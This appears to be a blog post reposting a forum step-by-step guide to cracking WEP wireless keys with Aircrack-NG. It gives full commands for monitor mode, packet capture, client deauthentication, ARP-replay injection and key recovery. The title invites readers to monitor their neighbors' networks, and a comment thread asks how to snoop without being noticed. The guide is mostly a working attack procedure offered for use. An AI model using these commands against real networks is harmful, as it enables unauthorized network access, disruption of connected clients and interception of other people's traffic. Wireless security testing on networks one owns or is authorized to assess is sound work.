Home > Linux > Aircrack-NG, monitor wireless traffic on your network, heck… monitor your neighbors ;)

Aircrack-NG, monitor wireless traffic on your network, heck… monitor your neighbors ;)

So I wanted to show users how to sniff out their local wireless traffic , capture it and decrypt it.  However, before I made up a long winded post I decided to research it, see if someone else has done the work already. Sure enough someone has, so take a look at the following link. The article is geared for identifying wireless security holes and exploting them. But i’ll let you read the rest. It’s not advanced stuff, you can learn more about aircrack-ng in still interested.

I’ve copied the posters conents here, if you don’t want to deal with the link. If you want the screenshots, you’l have to sign into the forums.

GENERAL INFORMATION:
Generally speaking there are 3 types of attacks:

1. Brute force attack
2. Dictionary attack
3. Statistical attack

By exploiting several security weaknesses of the WEP protocol Aircrack NG makes use of a statistical method to recover WEP keys. Provided that you have collected a sufficient number of IVs (= Initialization Vectors) and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.

HARDWARE:
I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won’t go into this. I have tested packet injection and decryption with:

1. Intel® PRO/Wireless 2200BG (IPW2200)
2. Linksys WUSB54G V4.0 (RT2570)

I recommend “Linksys WUSB54G V4.0” as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.

DRIVERS & PATCHES:
Before you proceed you need to compile your own drivers & install patches for packet re-injection. You find instructions here.

PREREQUISITES:
1. You have successfully patched your wireless driver (see link above).
2. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
3. ’00:09:5B:D7:43:A8′ is the MAC address of my network, so you need to replace it with your own.
4. ’00:00:00:00:00:00′ is the MAC address of the target client, NOT that of your own wireless card.

COMMAND LINE:
Please make sure that you stick to the exact sequence of actions and pay attention to section on MAC filtering.

  • 1. Enable monitoring with “airmon-ng” (screenshot #1):
  • Quote:
    sudo airmon-ng start <interface> <channel>
  • 2. Packet capturing with “airodump-ng” (screenshot #2):
    Quote:
    sudo airodump-ng –channel <channel> –write <file_name> <interface>

    Alternatively, try this (to collect data from target network only and hence increase performance):

    Quote:
    sudo airodump-ng –channel <channel> –bssid 00:09:5B:D7:43:A8 –write <file_name> <interface>

    NOTE:
    –channel… Select preferred channel; optional, however, channel hopping severely impacts and thus slows down collection process.
    –bssid… MAC address of target access point; optional, however, specifying access point will improve performance of collection process.
    –write… Preferred file name; mandatory field (in our case).

  • 3.1. Now check if MAC filtering is enabled or turned off:
    Quote:
    sudo aireplay-ng -1 0 -e <target_essid> -a 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>

    NOTE:
    -1… ‘0’ deauthenticates all clients.
    -e… ESSID of target access point.
    -a… MAC address of target access point.
    -h… MAC address of your choice.

  • 3.2. If the resulting output looks like this…
    Quote:
    18:22:32 Sending Authentication Request
    18:22:32 Authentication successful
    18:22:32 Sending Association Request
    18:22:32 Association successful 🙂

    …then MAC filtering is turned off & you can continue following section ‘No MAC filtering’, otherwise jump to section ‘MAC filtering’.

>> No MAC filtering <<

  • 4. Packet Re-injection with “aireplay-ng” (screenshot #4):
    Quote:
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point. As MAC filtering is off, use an arbitrary MAC address (‘MY:MA:CA:DD:RE:SS’).

    Continue with #6.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… MAC address of your choice.

>> MAC filtering <<

  • 4. Deauthentication with “aireplay-ng” (screenshot #3):
    Quote:
    sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00 <interface>

    NOTE:
    -0… Number of deauthentication attempts.
    -a… MAC address of target access point.
    -c… Client MAC address.

  • 5. Packet Re-injection with “aireplay-ng” (screenshot #4):
    Quote:
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00 <interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… Client MAC address.

  • 6. Decryption with “aircrack-ng” & “aircrack-ptw” (screenshot #5):Aircrack-ng:
    Quote:
    sudo aircrack-ng <file_name>.cap

    Aircrack-PTW:

    Quote:
    ./aircrack-ptw <file_name>.cap

CAPTURING:
This is a summary based on information given here and there, respectively:

Aircrack-NG:
64-bit key: ~250,000 packets
128-bit key: ~1,500,000 packets

Aircrack-PTW:
64-bit key: ~20,000 packets [estimate]
128-bit key: ~85,000 packets

FINALLY:
That’s it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.

Advertisements
Categories: Linux Tags: , , , ,
  1. anthonyvenable110
    March 9, 2012 at 1:46 am

    Very informative

  2. anthonyvenable110
    March 9, 2012 at 1:46 am

    Reblogged this on anthonyvenable110.

  3. September 30, 2012 at 9:42 am

    What precautions do we need to take to ensure that people don’t know who is snooping? I assume using a non-obvious host name as in not using “sfeolepc”. Anything else?

    • October 17, 2012 at 10:44 am

      Actually, the average user isn’t going to know that your snooping. All wireless traffic is out in the open. The safeguard we use is to encrypt the transmissions via WEP, WPA, WPA2 ,etc… Once you get a hold of those keys then you can intercept the traffic after it leaves the router while on it’s way to the users device. They won’t know that it’s been breached, the only safeguard You can take to make sure your wifi traffic is secure is to use the highest form of encryption available with a very very strong 128 + key over 10 characters,(alpha-numeric), Also DISABLE your SSID broadcast, believe it or not that’s the 1st big step to veer away any snoops.

  1. March 10, 2012 at 2:19 am

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: